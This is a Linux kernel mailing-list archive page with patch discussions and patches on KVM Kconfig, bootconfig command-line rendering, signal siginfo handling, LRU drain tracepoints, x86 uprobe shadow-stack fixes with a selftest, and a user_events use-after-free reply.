don't think there's anything else to be done?

^ permalink raw reply

* Re: [PATCH v8 05/46] KVM: Make CONFIG_KVM_VM_MEMORY_ATTRIBUTES selectable
From: Sean Christopherson @ 2026-06-23  0:16 UTC (permalink / raw)
  To: Julian Braha
  Cc: ackerleytng, aik, andrew.jones, binbin.wu, brauner, chao.p.peng,
	david, jmattson, jthoughton, michael.roth, oupton, pankaj.gupta,
	qperret, rick.p.edgecombe, rientjes, shivankg, steven.price,
	tabba, willy, wyihan, yan.y.zhao, forkloop, pratyush,
	suzuki.poulose, aneesh.kumar, liam, Paolo Bonzini,
	Thomas Gleixner, Ingo Molnar, Borislav Petkov, Dave Hansen, x86,
	H. Peter Anvin, Steven Rostedt, Masami Hiramatsu,
	Mathieu Desnoyers, Jonathan Corbet, Shuah Khan, Shuah Khan,
	Vishal Annapurve, Andrew Morton, Chris Li, Kairui Song,
	Kemeng Shi, Nhat Pham, Barry Song, Axel Rasmussen, Yuanchu Xie,
	Wei Xu, Youngjun Park, Qi Zheng, Shakeel Butt, Kiryl Shutsemau,
	Baoquan He, Jason Gunthorpe, Vlastimil Babka, kvm, linux-kernel,
	linux-trace-kernel, linux-doc, linux-kselftest, linux-mm,
	linux-coco
In-Reply-To: <8e53844c-f2f8-4a4b-bf72-f3140c170d43@gmail.com>

On Fri, Jun 19, 2026, Julian Braha wrote:
> Hi Ackerley,
> 
> On 6/19/26 01:31, Ackerley Tng via B4 Relay wrote:
> 
> >  config KVM_VM_MEMORY_ATTRIBUTES
> > -	bool
> > +	depends on KVM_SW_PROTECTED_VM || KVM_INTEL_TDX || KVM_AMD_SEV
> > +	bool "Enable per-VM PRIVATE vs. SHARED attributes (for CoCo VMs)"
> 
> Sorry for the style nitpick, but could you keep the type and prompt as
> the first attribute in the Kconfig option definition (like the other
> options do)?

No need to be sorry, I've no idea why I put the "depends" first.  I don't even
know if that qualifies as a nit :-)

Ackerley, if you can provide your SoB (for Fuad's feedback), I can fixup when
applying (assuming nothing else necessitates v9).

^ permalink raw reply

* Re: [PATCH v4 6/7] Documentation: bootconfig: document build-time cmdline rendering
From: Masami Hiramatsu @ 2026-06-23  0:11 UTC (permalink / raw)
  To: Breno Leitao
  Cc: Andrew Morton, Nathan Chancellor, paulmck, Nicolas Schier,
	Thomas Gleixner, Ingo Molnar, Borislav Petkov, Dave Hansen, x86,
	H. Peter Anvin, linux-kernel, linux-trace-kernel, linux-kbuild,
	bpf, kernel-team
In-Reply-To: <ajkfTQwmmVo0DvFx@gmail.com>

Hi Breno,

On Mon, 22 Jun 2026 05:30:53 -0700
Breno Leitao <leitao@debian.org> wrote:

> On Thu, Jun 18, 2026 at 09:47:19AM +0900, Masami Hiramatsu wrote:
> > On Wed, 17 Jun 2026 02:56:23 -0700
> > Breno Leitao <leitao@debian.org> wrote:
> > 
> > > On Wed, Jun 10, 2026 at 07:58:10AM -0700, Breno Leitao wrote:
> > > > On Wed, Jun 10, 2026 at 11:37:20PM +0900, Masami Hiramatsu wrote:
> > > > > To avoid confusion, when this option is used, shouldn't we treat it
> > > > > the same way as if embedded command lines were enabled, and either
> > > > > not display it in /proc/bootconfig (or always display it, by merging
> > > > > the rendered string)?
> > > > 
> > > > You're right that EMBED_CMDLINE breaks it: the embedded kernel.* keys
> > > > are already in boot_command_line before setup_boot_config() ever sees
> > > > the initrd bconf, so a user reading /proc/bootconfig would see only
> > > > the initrd keys while parse_early_param() acted on the embedded ones.
> > > > That's exactly the split-state Sashiko was circling around.
> > > > 
> > > > Both options you suggest work for me, but they pull in opposite
> > > > directions and I'd rather not guess wrong on the user-facing
> > > > contract.  Which do you prefer for v5?
> > > > 
> > > >   (a) Don't display embedded in /proc/bootconfig -- keep the current
> > > >       "file shows the active bootconfig source" behavior and document
> > > >       that with EMBED_CMDLINE=y, the kernel.* subtree may have been
> > > >       applied separately via the cmdline.
> > > > 
> > > >   (b) Always display embedded by merging the rendered string into
> > > >       /proc/bootconfig when EMBED_CMDLINE=y, so the file reflects
> > > >       what was actually applied.
> > > > 
> > > > Happy to go either way
> > > 
> > > Following up on my own mail rather than leaving it fully open: after
> > > looking at the code more, I'd like to recommend (a).
> > 
> > Agreed. Sorry for replying late.
> 
> No problem, thanks. Quick heads-up: v5 already went out and crossed with
> this mail. It takes (a) and extends bootconfig.rst to walk through the
> four sources (bootloader cmdline, embedded cmdline, initrd bootconfig,
> embedded bootconfig), so that part is already in flight:
> 
>   https://lore.kernel.org/r/20260617-bootconfig_using_tools-v5-0-fd589a9cc5e3@debian.org
> 
> The naming/mutual-exclusion rework below I'll fold into v6.

Yeah, thanks for updating!

> 
> > Indeed. So I think this EMBED_CMDLINE is more like CMDLINE set by
> > bootconfig file, instead of embedded string. That is useful for reusing
> > the boot options. We need to change the explanation and clarify it.
> 
> Agreed, that's a much clearer model. v6 will reframe the Kconfig help and
> bootconfig.rst around "this is CONFIG_CMDLINE, sourced from a bootconfig
> file at build time" rather than "an embedded bootconfig that also feeds
> the cmdline".

Nice!

> 
> It also matches what the code already does precedence-wise: the rendered
> "kernel" string is prepended to boot_command_line in setup_arch(), so it
> sits in front of the bootloader args and parse_args() last-wins lets the
> bootloader override it -- i.e. exactly CONFIG_CMDLINE without _OVERRIDE.
> So this is mostly a rename + dependency + docs change, not a behavioral
> one. (A _FORCE/_EXTEND-style variant could come later if there's demand;
> the current behavior is the plain "overridable default" one.)

OK. Yeah, for the first step, I think current behavior is enough.

> 
> > Thus we should those configs mutual exclusive. If user already sets the
> > CONFIG_CMDLINE, EMBED_CMDLINE should not be enabled.
> 
> Makes sense -- two built-in cmdline sources at once is confusing. I'll
> make them mutually exclusive in v6. I'm thinking:
> 
>   depends on CMDLINE = ""
> 
> on the new symbol. On x86 CONFIG_CMDLINE is a string that depends on
> CMDLINE_BOOL and defaults to "", so this reads as "only offer the
> bootconfig-rendered cmdline when no static CONFIG_CMDLINE is configured",
> and it works the same on other arches that define CMDLINE as a string.
> Does that match what you had in mind, or would you rather gate it the
> other way (CMDLINE depends on !the-new-symbol)?

No, this looks good and enough clear to me.

> 
> > So you can see CONFIG_BOOT_CONFIG_EMBED_CMDLINE is a bit special.
> > I think it maybe natual that we call it CONFIG_CMDLINE_BOOT_CONFIG.
> > In this case, we render the cmdline string from bootconfig build-time
> > and set CONFIG_CMDLINE with the rendered cmdline string.
> > So you can see CONFIG_BOOT_CONFIG_EMBED_CMDLINE is a bit special.
> > I think it maybe natual that we call it CONFIG_CMDLINE_BOOT_CONFIG.
> > In this case, we render the cmdline string from bootconfig build-time
> > and set CONFIG_CMDLINE with the rendered cmdline string.
> 
> I'll rename it for v6. One nit: the arch opt-in symbol is already
> ARCH_SUPPORTS_CMDLINE_FROM_BOOTCONFIG, so CONFIG_CMDLINE_FROM_BOOTCONFIG would
> pair with it verbatim. I'll use CONFIG_CMDLINE_FROM_BOOTCONFIG I'll rename it
> for v6.

Yeah, thanks!

> 
> Another nit: the arch opt-in symbol is already
> ARCH_SUPPORTS_CMDLINE_FROM_BOOTCONFIG, so CONFIG_CMDLINE_FROM_BOOTCONFIG would
> pair with it verbatim. I'll use CONFIG_CMDLINE_FROM_BOOTCONFIG unless you'd
> rather keep CONFIG_CMDLINE_BOOT_CONFIG -- either is fine by me.

I think it should use the same pattern to avoid confusion.

> 
> One clarification on "set CONFIG_CMDLINE with the rendered string":
> CONFIG_CMDLINE is a Kconfig string fixed when .config is read, while the
> render happens later during the build, so we can't literally store the
> rendered text into CONFIG_CMDLINE. The mechanism stays "render into
> .init.rodata, merge into boot_command_line in setup_arch()"; what changes
> is how we name and document it, plus the mutual exclusion above. Let me

Yes, it is fine to me because it does not change the current behavior.

> 
> > So you can see CONFIG_BOOT_CONFIG_EMBED_CMDLINE is a bit special.
> > I think it maybe natual that we call it CONFIG_CMDLINE_BOOT_CONFIG.
> 
> I'll rename it for v6. One nit: the arch opt-in symbol is already
> ARCH_SUPPORTS_CMDLINE_FROM_BOOTCONFIG, so CONFIG_CMDLINE_FROM_BOOTCONFIG
> would pair with it verbatim. I'll use CONFIG_CMDLINE_FROM_BOOTCONFIG

Yes, that's better to be renamed.

> > In this case, we render the cmdline string from bootconfig build-time
> > and set CONFIG_CMDLINE with the rendered cmdline string.
> 
> CONFIG_CMDLINE is a Kconfig string fixed when .config is read, while the
> render happens later during the build, so we can't literally store the
> rendered text into CONFIG_CMDLINE?  let me know if you can envision a way to
> get it done.

Ah, ok. Nevermind, as far as it is shown in /proc/cmdline, I think it is OK.
(BTW, if we use the embedded bootconfig, the file path is shown in
 /proc/config.gz, maybe I need to notice it.)

> > I think we can proceed it without rendering it in /proc/bootconfig
> > at this point. And later we find the way to detect early parameters
> > correctly, we can fix it.
> 
> Sounds good. I'll document the sharp edge (with both an embedded cmdline and an
> initrd bootconfig, early params reflect the embedded values because the initrd
> isn't parsed yet) and leave the early-param-aware override detection as the
> follow-up you describe.

Thanks for the documenting :)

> 
> > (BTW, early parameter problem is a bit complicated. It is not hard
> > to distinguish early parameters, but kernel accepts the same key
> > for early parameter and normal parameter. e.g. "console=")
> 
> Right, console= being both is the awkward case. Agreed that's better as
> its own series once we have a reliable way to detect early params.
> 
> So the v6 plan:
>   - rename CONFIG_BOOT_CONFIG_EMBED_CMDLINE -> CONFIG_CMDLINE_FROM_BOOTCONFIG
>     (or _BOOT_CONFIG, your call)
>   - make it mutually exclusive with CONFIG_CMDLINE (depends on CMDLINE = "")
>   - reframe the Kconfig help + bootconfig.rst as "CONFIG_CMDLINE from a
>     bootconfig file"
>   - keep (a): no rendering in /proc/bootconfig; document the early-param
>     sharp edge
>   - defer early-param-aware override detection to a follow-up
> 
> Thanks for the direction,

Thanks for working on this feature!

Thank you,

> --breno
> 


-- 
Masami Hiramatsu (Google) <mhiramat@kernel.org>

^ permalink raw reply

* [PATCH v2 2/2] signal: make send_signal_locked() take const siginfo
From: Bradley Morgan @ 2026-06-22 20:25 UTC (permalink / raw)
  To: Oleg Nesterov, Christian Brauner
  Cc: Steven Rostedt, Masami Hiramatsu, Mathieu Desnoyers,
	Andrew Morton, Peter Zijlstra, Marco Elver, Aleksandr Nogikh,
	Thomas Gleixner, Adrian Huang, Kexin Sun, linux-kernel,
	linux-trace-kernel, Bradley Morgan
In-Reply-To: <20260622164029.11474-1-include@grrlz.net>

send_signal_locked() should not change the caller's siginfo. Make that
part of the type and keep the local rewrite on its copy.

Suggested-by: Oleg Nesterov <oleg@redhat.com>
Signed-off-by: Bradley Morgan <include@grrlz.net>
---
Changes since v1:
- New patch from Oleg's suggestion.
- Link to Oleg's suggestion:
  https://lore.kernel.org/all/0873AC4A-3CB2-4F7B-BFE6-75D855AD22DC@grrlz.net/T/#m5f8a2d54928efff41de539969b68149e1ec5fca4

 include/linux/signal.h        |  2 +-
 include/trace/events/signal.h |  4 ++--
 kernel/signal.c               | 20 +++++++++++---------
 3 files changed, 14 insertions(+), 12 deletions(-)

diff --git a/include/linux/signal.h b/include/linux/signal.h
index f19816832f05..a1ba8c5973c6 100644
--- a/include/linux/signal.h
+++ b/include/linux/signal.h
@@ -283,7 +283,7 @@ extern int do_send_sig_info(int sig, struct kernel_siginfo *info,
 				struct task_struct *p, enum pid_type type);
 extern int group_send_sig_info(int sig, struct kernel_siginfo *info,
 			       struct task_struct *p, enum pid_type type);
-extern int send_signal_locked(int sig, struct kernel_siginfo *info,
+extern int send_signal_locked(int sig, const struct kernel_siginfo *info,
 			      struct task_struct *p, enum pid_type type);
 extern int sigprocmask(int, sigset_t *, sigset_t *);
 extern void set_current_blocked(sigset_t *);
diff --git a/include/trace/events/signal.h b/include/trace/events/signal.h
index 1db7e4b07c01..05a46135ee34 100644
--- a/include/trace/events/signal.h
+++ b/include/trace/events/signal.h
@@ -49,8 +49,8 @@ enum {
  */
 TRACE_EVENT(signal_generate,
 
-	TP_PROTO(int sig, struct kernel_siginfo *info, struct task_struct *task,
-			int group, int result),
+	TP_PROTO(int sig, const struct kernel_siginfo *info,
+		 struct task_struct *task, int group, int result),
 
 	TP_ARGS(sig, info, task, group, result),
 
diff --git a/kernel/signal.c b/kernel/signal.c
index d72d9be3a992..26e8b8e1d03c 100644
--- a/kernel/signal.c
+++ b/kernel/signal.c
@@ -1037,7 +1037,7 @@ static inline bool legacy_queue(struct sigpending *signals, int sig)
 	return (sig < SIGRTMIN) && sigismember(&signals->signal, sig);
 }
 
-static int __send_signal_locked(int sig, struct kernel_siginfo *info,
+static int __send_signal_locked(int sig, const struct kernel_siginfo *info,
 				struct task_struct *t, enum pid_type type, bool force)
 {
 	struct sigpending *pending;
@@ -1154,7 +1154,7 @@ static int __send_signal_locked(int sig, struct kernel_siginfo *info,
 	return ret;
 }
 
-static inline bool has_si_pid_and_uid(struct kernel_siginfo *info)
+static inline bool has_si_pid_and_uid(const struct kernel_siginfo *info)
 {
 	bool ret = false;
 	switch (siginfo_layout(info->si_signo, info->si_code)) {
@@ -1178,10 +1178,11 @@ static inline bool has_si_pid_and_uid(struct kernel_siginfo *info)
 	return ret;
 }
 
-int send_signal_locked(int sig, struct kernel_siginfo *info,
+int send_signal_locked(int sig, const struct kernel_siginfo *info,
 		       struct task_struct *t, enum pid_type type)
 {
 	struct kernel_siginfo rewritten;
+	const struct kernel_siginfo *send_info = info;
 	/* Should SIGKILL or SIGSTOP be received by a pid namespace init? */
 	bool force = false;
 
@@ -1196,26 +1197,27 @@ int send_signal_locked(int sig, struct kernel_siginfo *info,
 		struct user_namespace *t_user_ns;
 
 		rewritten = *info;
-		info = &rewritten;
+		send_info = &rewritten;
 
 		rcu_read_lock();
 		t_user_ns = task_cred_xxx(t, user_ns);
 		if (current_user_ns() != t_user_ns) {
-			kuid_t uid = make_kuid(current_user_ns(), info->si_uid);
-			info->si_uid = from_kuid_munged(t_user_ns, uid);
+			kuid_t uid = make_kuid(current_user_ns(), rewritten.si_uid);
+
+			rewritten.si_uid = from_kuid_munged(t_user_ns, uid);
 		}
 		rcu_read_unlock();
 
 		/* A kernel generated signal? */
-		force = (info->si_code == SI_KERNEL);
+		force = (rewritten.si_code == SI_KERNEL);
 
 		/* From an ancestor pid namespace? */
 		if (!task_pid_nr_ns(current, task_active_pid_ns(t))) {
-			info->si_pid = 0;
+			rewritten.si_pid = 0;
 			force = true;
 		}
 	}
-	return __send_signal_locked(sig, info, t, type, force);
+	return __send_signal_locked(sig, send_info, t, type, force);
 }
 
 static void print_fatal_signal(int signr)
-- 
2.53.0

^ permalink raw reply related

* [PATCH v2 1/2] signal: avoid shared siginfo namespace rewrites
From: Bradley Morgan @ 2026-06-22 20:25 UTC (permalink / raw)
  To: Oleg Nesterov, Christian Brauner
  Cc: Steven Rostedt, Masami Hiramatsu, Mathieu Desnoyers,
	Andrew Morton, Peter Zijlstra, Marco Elver, Aleksandr Nogikh,
	Thomas Gleixner, Adrian Huang, Kexin Sun, linux-kernel,
	linux-trace-kernel, Bradley Morgan, stable
In-Reply-To: <20260622164029.11474-1-include@grrlz.net>

send_signal_locked() rewrites sender ids for the target namespace.
Group sends reuse the same siginfo, so one recipient can affect the
next.

Copy the siginfo before changing it.

Fixes: 7a0cf094944e ("signal: Correct namespace fixups of si_pid and si_uid")
Cc: stable@vger.kernel.org
Signed-off-by: Bradley Morgan <include@grrlz.net>
---
Changes since v1:
- No code changes in this patch.
- Add patch 2 for Oleg's const suggestion.
- Link to v1:
  https://lore.kernel.org/all/0873AC4A-3CB2-4F7B-BFE6-75D855AD22DC@grrlz.net/T/#m89955d13f10807c316d34cc76680d690a2d95b31

 kernel/signal.c | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/kernel/signal.c b/kernel/signal.c
index b9fc7be1a169..d72d9be3a992 100644
--- a/kernel/signal.c
+++ b/kernel/signal.c
@@ -1181,6 +1181,7 @@ static inline bool has_si_pid_and_uid(struct kernel_siginfo *info)
 int send_signal_locked(int sig, struct kernel_siginfo *info,
 		       struct task_struct *t, enum pid_type type)
 {
+	struct kernel_siginfo rewritten;
 	/* Should SIGKILL or SIGSTOP be received by a pid namespace init? */
 	bool force = false;
 
@@ -1194,6 +1195,9 @@ int send_signal_locked(int sig, struct kernel_siginfo *info,
 		/* SIGKILL and SIGSTOP is special or has ids */
 		struct user_namespace *t_user_ns;
 
+		rewritten = *info;
+		info = &rewritten;
+
 		rcu_read_lock();
 		t_user_ns = task_cred_xxx(t, user_ns);
 		if (current_user_ns() != t_user_ns) {
-- 
2.53.0

^ permalink raw reply related

* Re: [PATCH v3 5/7] kernel: Use mutable list iterators
From: Eduard Zingerman @ 2026-06-22 19:03 UTC (permalink / raw)
  To: Kaitao Cheng, Paul Moore, Eric Paris, Alexei Starovoitov,
	Daniel Borkmann, Andrii Nakryiko, Kumar Kartikeya Dwivedi,
	David S. Miller, Jakub Kicinski, Jesper Dangaard Brouer,
	John Fastabend, Tejun Heo, Johannes Weiner, Michal Koutný,
	Maarten Lankhorst, Maxime Ripard, Natalie Vock, Peter Zijlstra,
	Ingo Molnar, Arnaldo Carvalho de Melo, Namhyung Kim,
	Masami Hiramatsu, Oleg Nesterov, Peter Oberparleiter,
	Andrew Morton, Baoquan He, Mike Rapoport, Pasha Tatashin,
	Pratyush Yadav, Naveen N Rao, Josh Poimboeuf, Jiri Kosina,
	Miroslav Benes, Petr Mladek, Will Deacon, Boqun Feng,
	Luis Chamberlain, Petr Pavlu, Daniel Gomez, Sami Tolvanen,
	Steffen Klassert, Daniel Jordan, Rafael J. Wysocki,
	Davidlohr Bueso, Paul E. McKenney, Josh Triplett,
	Frederic Weisbecker, Neeraj Upadhyay, Joel Fernandes,
	Uladzislau Rezki, Juri Lelli, Vincent Guittot, Kees Cook,
	Balbir Singh, Anna-Maria Behnsen, Thomas Gleixner, John Stultz,
	KP Singh, Matt Bobrowski, Nathan Chancellor, Martin KaFai Lau,
	Song Liu, Mark Rutland, Mathieu Desnoyers, Dietmar Eggemann,
	David Vernet, Steven Rostedt
  Cc: audit, linux-kernel, bpf, netdev, cgroups, dri-devel,
	linux-perf-users, linux-trace-kernel, kexec, live-patching,
	linux-modules, linux-crypto, linux-pm, rcu, sched-ext, llvm,
	Kaitao Cheng
In-Reply-To: <20260622042811.31684-1-kaitao.cheng@linux.dev>

On Mon, 2026-06-22 at 12:28 +0800, Kaitao Cheng wrote:
> From: Kaitao Cheng <chengkaitao@kylinos.cn>
> 
> The safe list iteration helpers require callers to provide a temporary
> cursor even when the cursor is only used internally by the loop. This
> leaves many functions with otherwise unused variables whose only purpose
> is to satisfy the old iterator interface.
> 
> Use the mutable list iteration helpers for those cases. The mutable
> helpers keep the same removal-safe traversal semantics, while allowing
> the temporary cursor to be internal to the macro when the caller does
> not need to observe it.
> 
> Convert list, hlist and llist users under kernel/ where the temporary
> cursor is not used outside the iteration. Keep the explicit cursor form
> where the next entry is still needed by the surrounding code.
> 
> No functional change intended.
> 
> Signed-off-by: Kaitao Cheng <chengkaitao@kylinos.cn>
> ---

Beside the fact that this does not apply,
I don't see a reason why is this needed for BPF sub-tree.

[...]

^ permalink raw reply

* [PATCH v5] mm/lruvec: trace LRU add drains and drain-all requests
From: JP Kobryn @ 2026-06-22 18:51 UTC (permalink / raw)
  To: linux-mm, willy, shakeel.butt, usama.arif, akpm, vbabka, mhocko,
	rostedt, mhiramat, mathieu.desnoyers, kasong, qi.zheng, baohua,
	axelrasmussen, yuanchu, weixugc, chrisl, shikemeng, nphamcs,
	baoquan.he, youngjun.park
  Cc: linux-kernel, linux-trace-kernel

LRU add batches can be drained before they reach capacity. This can be a
source of LRU lock contention, but it is not currently possible to
attribute these drains to callers with existing tracepoints.

Add mm_lru_add_drain to report the CPU and lru_add batch count when an
lru_add batch is drained. This allows tracing to distinguish full drains
from partial drains and attribute them to the calling stack.

Add mm_lru_add_drain_all to capture callers of __lru_add_drain_all and
whether they set the force flag for all CPUs. The tracepoint resembles
the signature of the enclosing function, but is needed because of
potential inlining.

Note that DECLARE_TRACE() is used for these new trace hooks to avoid
creating a new trace event ABI.

Signed-off-by: JP Kobryn <jp.kobryn@linux.dev>
Reviewed-by: Barry Song <baohua@kernel.org>
Acked-by: Shakeel Butt <shakeel.butt@linux.dev>
---
v5:
  - change from trace events to bare trace hooks

v4: https://lore.kernel.org/linux-mm/20260610234808.212397-1-jp.kobryn@linux.dev/
  - renamed nr_folio_add to nr_folios in lru_add_drain()
  - renamed nr to nr_folios in tracepoint for consistency

v3: https://lore.kernel.org/linux-mm/20260610195220.12403-1-jp.kobryn@linux.dev/
  - restored and renamed tracepoint in __lru_add_drain_all

v2: https://lore.kernel.org/linux-mm/20260609041156.31127-1-jp.kobryn@linux.dev/
  - removed mm_lru_drain_all tracepoint

v1: https://lore.kernel.org/linux-mm/20260609041156.31127-1-jp.kobryn@linux.dev/

 include/trace/events/pagemap.h | 8 ++++++++
 mm/swap.c                      | 7 ++++++-
 2 files changed, 14 insertions(+), 1 deletion(-)

diff --git a/include/trace/events/pagemap.h b/include/trace/events/pagemap.h
index 171524d3526d..36c3a90f0acc 100644
--- a/include/trace/events/pagemap.h
+++ b/include/trace/events/pagemap.h
@@ -77,6 +77,14 @@ TRACE_EVENT(mm_lru_activate,
 	TP_printk("folio=%p pfn=0x%lx", __entry->folio, __entry->pfn)
 );
 
+DECLARE_TRACE(mm_lru_add_drain,
+	      TP_PROTO(int cpu, unsigned int nr_folios),
+	      TP_ARGS(cpu, nr_folios));
+
+DECLARE_TRACE(mm_lru_add_drain_all,
+	      TP_PROTO(bool force_all_cpus),
+	      TP_ARGS(force_all_cpus));
+
 #endif /* _TRACE_PAGEMAP_H */
 
 /* This part must be outside protection */
diff --git a/mm/swap.c b/mm/swap.c
index 588f50d8f1a8..460e56370b3c 100644
--- a/mm/swap.c
+++ b/mm/swap.c
@@ -694,9 +694,12 @@ void lru_add_drain_cpu(int cpu)
 {
 	struct cpu_fbatches *fbatches = &per_cpu(cpu_fbatches, cpu);
 	struct folio_batch *fbatch = &fbatches->lru_add;
+	unsigned int nr_folios = folio_batch_count(fbatch);
 
-	if (folio_batch_count(fbatch))
+	if (nr_folios) {
 		folio_batch_move_lru(fbatch, lru_add);
+		trace_mm_lru_add_drain_tp(cpu, nr_folios);
+	}
 
 	fbatch = &fbatches->lru_move_tail;
 	/* Disabling interrupts below acts as a compiler barrier. */
@@ -869,6 +872,8 @@ static inline void __lru_add_drain_all(bool force_all_cpus)
 	if (WARN_ON(!mm_percpu_wq))
 		return;
 
+	trace_mm_lru_add_drain_all_tp(force_all_cpus);
+
 	/*
 	 * Guarantee folio_batch counter stores visible by this CPU
 	 * are visible to other CPUs before loading the current drain
-- 
2.54.0


^ permalink raw reply related

* [PATCH 2/2] selftests/x86: Add shadow stack uprobe CALL test
From: David Windsor @ 2026-06-22 18:31 UTC (permalink / raw)
  To: mhiramat, oleg, peterz
  Cc: tglx, mingo, bp, dave.hansen, x86, shuah, linux-trace-kernel,
	linux-kselftest, linux-kernel, David Windsor
In-Reply-To: <20260622183109.1137245-1-dwindsor@gmail.com>

Add coverage for entry uprobes installed on CALL instructions while user
shadow stack is enabled. The test puts an entry uprobe on a helper whose
first instruction is a relative CALL, then verifies that the call/return
sequence completes without SIGSEGV.

This catches regressions where x86 uprobe CALL emulation updates the
regular user stack but leaves the CET shadow stack stale.

Signed-off-by: David Windsor <dwindsor@gmail.com>
---
 tools/testing/selftests/x86/test_shadow_stack.c | 86 +++++++++++++++++++++++++
 1 file changed, 86 insertions(+)

diff --git a/tools/testing/selftests/x86/test_shadow_stack.c b/tools/testing/selftests/x86/test_shadow_stack.c
index 21af54d5f4ea..3d6ca33edba4 100644
--- a/tools/testing/selftests/x86/test_shadow_stack.c
+++ b/tools/testing/selftests/x86/test_shadow_stack.c
@@ -873,6 +873,86 @@ static int test_uretprobe(void)
 	return err;
 }
 
+/* Keep the CALL first so the function address is exactly the probed CALL. */
+extern void uprobe_call_trigger(void);
+asm (".pushsection .text\n"
+	".global uprobe_call_target\n"
+	".type uprobe_call_target, @function\n"
+	"uprobe_call_target:\n"
+	"	ret\n"
+	".size uprobe_call_target, .-uprobe_call_target\n"
+
+	".global uprobe_call_trigger\n"
+	".type uprobe_call_trigger, @function\n"
+	"uprobe_call_trigger:\n"
+	"	call uprobe_call_target\n"
+	"	ret\n"
+	".size uprobe_call_trigger, .-uprobe_call_trigger\n"
+	".popsection\n"
+);
+
+/* If CALL emulation misses the shadow stack update, this exits via SIGSEGV. */
+static int test_uprobe_call(void)
+{
+	const size_t attr_sz = sizeof(struct perf_event_attr);
+	const char *file = "/proc/self/exe";
+	int fd = -1, type, err = 1;
+	struct perf_event_attr attr;
+	struct sigaction sa = {};
+	ssize_t offset;
+
+	type = determine_uprobe_perf_type();
+	if (type < 0) {
+		if (type == -ENOENT)
+			printf("[SKIP]\tUprobe on CALL test, uprobes are not available\n");
+		return 0;
+	}
+
+	offset = get_uprobe_offset(uprobe_call_trigger);
+	if (offset < 0)
+		return 1;
+
+	sa.sa_sigaction = segv_gp_handler;
+	sa.sa_flags = SA_SIGINFO;
+	if (sigaction(SIGSEGV, &sa, NULL))
+		return 1;
+
+	/* Setup entry uprobe through perf event interface. */
+	memset(&attr, 0, attr_sz);
+	attr.size = attr_sz;
+	attr.type = type;
+	attr.config = 0;
+	attr.config1 = (__u64)(unsigned long)file;
+	attr.config2 = offset;
+
+	fd = syscall(__NR_perf_event_open, &attr, 0 /* pid */, -1 /* cpu */,
+		     -1 /* group_fd */, PERF_FLAG_FD_CLOEXEC);
+	if (fd < 0)
+		goto out;
+
+	if (sigsetjmp(jmp_buffer, 1))
+		goto out;
+
+	if (ARCH_PRCTL(ARCH_SHSTK_ENABLE, ARCH_SHSTK_SHSTK))
+		goto out;
+
+	/*
+	 * This either segfaults and goes through sigsetjmp above
+	 * or succeeds and we're good.
+	 */
+	uprobe_call_trigger();
+
+	printf("[OK]\tUprobe on CALL test\n");
+	err = 0;
+
+out:
+	ARCH_PRCTL(ARCH_SHSTK_DISABLE, ARCH_SHSTK_SHSTK);
+	signal(SIGSEGV, SIG_DFL);
+	if (fd >= 0)
+		close(fd);
+	return err;
+}
+
 void segv_handler_ptrace(int signum, siginfo_t *si, void *uc)
 {
 	/* The SSP adjustment caused a segfault. */
@@ -1071,6 +1151,12 @@ int main(int argc, char *argv[])
 		goto out;
 	}
 
+	if (test_uprobe_call()) {
+		ret = 1;
+		printf("[FAIL]\tuprobe on CALL test\n");
+		goto out;
+	}
+
 	return ret;
 
 out:
-- 
2.43.0

^ permalink raw reply related

* [PATCH 1/2] x86/uprobes: Keep shadow stack in sync for emulated CALLs
From: David Windsor @ 2026-06-22 18:31 UTC (permalink / raw)
  To: mhiramat, oleg, peterz
  Cc: tglx, mingo, bp, dave.hansen, x86, shuah, linux-trace-kernel,
	linux-kselftest, linux-kernel, David Windsor

Uprobe CALL emulation updates the normal user stack, but not the CET user
shadow stack. The subsequent RET then sees a stale shadow stack entry and
raises #CP.

Update the relative CALL emulation and XOL CALL fixup paths to keep the
shadow stack in sync.

Fixes: 488af8ea7131 ("x86/shstk: Wire in shadow stack interface")
Signed-off-by: David Windsor <dwindsor@gmail.com>
---
 arch/x86/kernel/uprobes.c | 10 +++++++++-
 1 file changed, 9 insertions(+), 1 deletion(-)

diff --git a/arch/x86/kernel/uprobes.c b/arch/x86/kernel/uprobes.c
index ebb1baf1eb1d..ae32013a7097 100644
--- a/arch/x86/kernel/uprobes.c
+++ b/arch/x86/kernel/uprobes.c
@@ -1246,8 +1246,12 @@ static int default_post_xol_op(struct arch_uprobe *auprobe, struct pt_regs *regs
 		long correction = utask->vaddr - utask->xol_vaddr;
 		regs->ip += correction;
 	} else if (auprobe->defparam.fixups & UPROBE_FIX_CALL) {
+		unsigned long retaddr = utask->vaddr + auprobe->defparam.ilen;
+
 		regs->sp += sizeof_long(regs); /* Pop incorrect return address */
-		if (emulate_push_stack(regs, utask->vaddr + auprobe->defparam.ilen))
+		if (emulate_push_stack(regs, retaddr))
+			return -ERESTART;
+		if (shstk_update_last_frame(retaddr))
 			return -ERESTART;
 	}
 	/* popf; tell the caller to not touch TF */
@@ -1338,6 +1342,10 @@ static bool branch_emulate_op(struct arch_uprobe *auprobe, struct pt_regs *regs)
 		 */
 		if (emulate_push_stack(regs, new_ip))
 			return false;
+		if (shstk_push(new_ip) == -EFAULT) {
+			regs->sp += sizeof_long(regs);
+			return false;
+		}
 	} else if (!check_jmp_cond(auprobe, regs)) {
 		offs = 0;
 	}
-- 
2.43.0

^ permalink raw reply related

* Re: [PATCH] tracing/user_events: fix use-after-free of enabler in user_event_mm_dup()
From: XIAO WU @ 2026-06-22 17:03 UTC (permalink / raw)
  To: Michael Bommarito, Steven Rostedt, Masami Hiramatsu,
	Mathieu Desnoyers
  Cc: Beau Belgrave, linux-trace-kernel, linux-kernel, stable
In-Reply-To: <20260618222743.538915-1-michael.bommarito@gmail.com>

Hi,

I came across the Sashiko AI review [1] in this thread and wanted to
share some test results that may be useful.

First — thank you for this patch!  The enabler UAF in
user_event_mm_dup() is a real bug and the fix (kfree → kfree_rcu) is
the right approach for protecting the RCU list walkers.  The selftest
results you included in the commit are also really helpful.

However, I was able to reproduce a second UAF on the *user_event*
object that the Sashiko review flagged — it's still reachable after the
patch is applied.  I've included a PoC and crash log below.

On Thu, Jun 18, 2026 at 06:27:43PM -0400, Michael Bommarito wrote:
 > @@ -404,7 +407,12 @@ static void user_event_enabler_destroy(struct 
user_event_enabler *enabler,
 >      /* No longer tracking the event via the enabler */
 >      user_event_put(enabler->event, locked);
 >
 > -    kfree(enabler);
 > +    /*
 > +     * The enabler is removed from an RCU-traversed list
 > +     * (user_event_mm_dup walks mm->enablers under rcu_read_lock only),
 > +     * so the backing memory must outlive a grace period.
 > +     */
 > +    kfree_rcu(enabler, rcu);
 >  }

